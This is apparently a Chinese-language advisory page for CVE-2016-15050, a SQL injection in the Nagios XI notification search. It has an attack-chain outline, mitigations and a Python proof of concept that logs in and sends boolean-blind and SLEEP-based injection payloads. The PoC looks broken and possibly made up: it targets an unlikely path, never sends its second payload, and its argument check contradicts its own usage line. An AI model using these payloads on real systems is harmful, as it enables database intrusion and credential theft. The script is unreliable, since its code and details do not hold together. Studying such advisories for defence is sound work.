CVE-2016-15050 Nagios XI通知搜索SQL注入漏洞

漏洞信息

漏洞编号

CVE-2016-15050

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nagios XI

漏洞概述

CVE-2016-15050是Nagios XI软件中的一个高危SQL注入漏洞。该漏洞存在于Nagios XI 5.2.4之前版本的通知搜索功能模块中。攻击者可以通过在搜索参数中注入恶意SQL代码，利用应用程序对用户输入处理不当的缺陷，未经充分授权即可操纵数据库查询。由于该功能在处理搜索参数时直接将用户输入拼接到SQL语句中，缺少必要的参数化或输入消毒处理，认证用户（即使仅具有低权限）即可利用此漏洞。成功 exploitation 后，攻击者可获取敏感通知数据、修改数据库内容，甚至在特定条件下横向扩展影响范围，对应用程序的整体数据库安全造成严重威胁。此漏洞的CVSS评分高达8.8，属于高危级别，需要立即采取修复措施。

技术细节

Nagios XI的通知搜索功能存在SQL注入漏洞，根源在于程序在构建SQL查询时直接使用用户可控的搜索参数而未进行适当处理。漏洞触发点位于notification search功能的参数处理逻辑中，攻击者可通过构造特殊的SQL片段作为搜索关键词，绕过前端输入限制并最终影响后端数据库查询。具体利用时，攻击者以低权限账户登录系统后，在通知搜索框中输入包含SQL注入payload的参数值，如使用UNION SELECT或布尔盲注等技术，可逐步提取数据库中的敏感信息，包括用户凭证、系统配置及其他应用程序数据。由于SQL语句执行结果会影响应用程序行为，攻击者还可能通过堆叠查询或条件触发实现数据篡改或进一步攻击。该漏洞的技术难点在于需要认证身份，但由于只需低权限账户，攻击门槛相对较低。修复方案应在数据库查询层实施参数化查询，并对所有用户输入进行严格的白名单验证。

攻击链分析

STEP 1

步骤1

攻击者获取Nagios XI系统的低权限账户访问权限

STEP 2

步骤2

登录系统后访问通知搜索功能模块

STEP 3

步骤3

在搜索参数中注入恶意SQL代码片段

STEP 4

步骤4

利用UNION注入或布尔盲注技术提取数据库敏感信息

STEP 5

步骤5

通过SQL注入获取用户凭证、数据库结构或其他敏感数据

STEP 6

步骤6

在特定条件下可能利用数据库写入能力进行数据篡改或进一步提权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2016-15050 Nagios XI SQL Injection PoC
# Target: Nagios XI < 5.2.4
# Vulnerability: SQL Injection in notification search

def exploit_sqli(target_url, username, password):
    """
    Exploit SQL injection in Nagios XI notification search
    """
    login_url = f"{target_url}/nagiosxi/login.php"
    search_url = f"{target_url}/nagiosxi/includes/components/nagiosgraph/cgi-bin/notification.cgi"
    
    session = requests.Session()
    
    # Step 1: Login with low-privilege account
    login_data = {
        'username': username,
        'password': password
    }
    
    response = session.post(login_url, data=login_data)
    
    if 'nagiosxi' not in response.cookies:
        print("[-] Login failed")
        return None
    
    print("[+] Login successful")
    
    # Step 2: Exploit SQL injection in search parameter
    # Blind boolean-based SQL injection payload
    sqli_payload = "1' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 FROM information_schema.tables) END) AND '1'='1"
    
    search_params = {
        'search': sqli_payload,
        'limit': '100'
    }
    
    response = session.get(search_url, params=search_params)
    
    # Step 3: Extract data using time-based or boolean blind injection
    # Example: Extract database version
    version_payload = "1' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(5) ELSE 0 END) AND '1'='1"
    
    search_params['search'] = version_payload
    
    print("[+] Sending SQL injection payload...")
    print(f"[+] Payload: {version_payload}")
    
    return session.cookies.get_dict()

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_sqli(target, user, pwd)

影响范围

Nagios XI < 5.2.4

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用层实施严格的输入过滤机制，过滤SQL特殊字符；2) 限制低权限账户对通知搜索功能的访问；3) 启用数据库审计日志监控异常查询行为；4) 在网络层部署WAF防护；5) 考虑临时禁用通知搜索功能直到完成升级修复。